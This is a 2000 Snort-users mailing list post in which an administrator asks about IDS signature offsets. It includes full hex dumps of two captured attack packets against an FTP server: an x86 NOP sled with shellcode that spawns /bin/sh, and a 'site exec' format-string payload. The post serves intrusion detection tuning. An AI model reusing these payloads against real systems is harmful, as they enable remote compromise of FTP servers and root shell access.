[Snort-users] Problem with IDS287 signature

Steve Halligan agent33 at ...187...
Fri Jul 28 16:21:16 EDT 2000


I got the follow packet trace, which was Identified as a IDS181 Misc
shellcode x86 NOPS.  After poking aroung in the whitehats db, this really
looks like a IDS 287 with a slightly different offset.  Any body know
anything about this attack?  Can the offset vary?  If so we need to modify
the rule.

***Cut to trace***
[**] IDS181 - MISC - Shellcode X86 NOPS [**]
07/28-13:21:29.323204 0:E0:D0:14:E7:CF -> 0:1:2:3B:21:4A type:0x800
len:0x23C
xx.xx.xx.xx:1355 -> yy.yy.yy.yy:21 TCP TTL:46 TOS:0x0 ID:59968  DF
*****PA* Seq: 0xB1FB524E   Ack: 0x97A6C12E   Win: 0x7D78
TCP Options => NOP NOP TS: 33656945 86600292 
50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90  PASS ...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
31 C0 31 DB 31 C9 B0 46 CD 80 31 C0 31 DB 43 89  1.1.1..F..1.1.C.
D9 41 B0 3F CD 80 EB 6B 5E 31 C0 31 C9 8D 5E 01  .A.?...k^1.1..^.
88 46 04 66 B9 FF FF 01 B0 27 CD 80 31 C0 8D 5E  .F.f.....'..1..^
01 B0 3D CD 80 31 C0 31 DB 8D 5E 08 89 43 02 31  ..=..1.1..^..C.1
C9 FE C9 31 C0 8D 5E 08 B0 0C CD 80 FE C9 75 F3  ...1..^.......u.
31 C0 88 46 09 8D 5E 08 B0 3D CD 80 FE 0E B0 30  1..F..^..=.....0
FE C8 88 46 04 31 C0 88 46 07 89 76 08 89 46 0C  ...F.1..F..v..F.
89 F3 8D 4E 08 8D 56 0C B0 0B CD 80 31 C0 31 DB  ...N..V.....1.1.
B0 01 CD 80 E8 90 FF FF FF FF FF FF 30 62 69 6E  ............0bin
30 73 68 31 2E 2E 31 31 0D 0A                    0sh1..11..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP-site-exec [**]
07/28-13:21:31.843204 0:E0:D0:14:E7:CF -> 0:1:2:3B:21:4A type:0x800
len:0x1F6
xx.xx.xx.xx:1355 -> yy.yy.yy.yy:21 TCP TTL:46 TOS:0x0 ID:60046  DF
*****PA* Seq: 0xB1FB5448   Ack: 0x97A6C54F   Win: 0x7D78
TCP Options => NOP NOP TS: 33657195 86600342 
73 69 74 65 20 65 78 65 63 20 78 78 28 B0 FF FF  site exec xx(...
BF 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66  .%.f%.f%.f%.f%.f
25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25  %.f%.f%.f%.f%.f%
2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E  .f%.f%.f%.f%.f%.
66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66  f%.f%.f%.f%.f%.f
25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25  %.f%.f%.f%.f%.f%
2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E  .f%.f%.f%.f%.f%.
66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66  f%.f%.f%.f%.f%.f
25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25  %.f%.f%.f%.f%.f%
2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E  .f%.f%.f%.f%.f%.
66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66  f%.f%.f%.f%.f%.f
25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25  %.f%.f%.f%.f%.f%
2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E  .f%.f%.f%.f%.f%.
66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66  f%.f%.f%.f%.f%.f
25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25  %.f%.f%.f%.f%.f%
2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E  .f%.f%.f%.f%.f%.
66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66  f%.f%.f%.f%.f%.f
25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25  %.f%.f%.f%.f%.f%
2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E  .f%.f%.f%.f%.f%.
66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66  f%.f%.f%.f%.f%.f
25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25  %.f%.f%.f%.f%.f%
2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E  .f%.f%.f%.f%.f%.
66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66  f%.f%.f%.f%.f%.f
25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25  %.f%.f%.f%.f%.f%
2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E  .f%.f%.f%.f%.f%.
66 25 2E 66 25 2E 66 25 2E 66 25 2E 66 25 2E 66  f%.f%.f%.f%.f%.f
25 2E 66 25 2E 66 25 63 25 63 25 63 25 2E 66 7C  %.f%.f%c%c%c%.f|
25 70 0D 0A                                      %p..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20000728/372576de/attachment.html>


More information about the Snort-users mailing list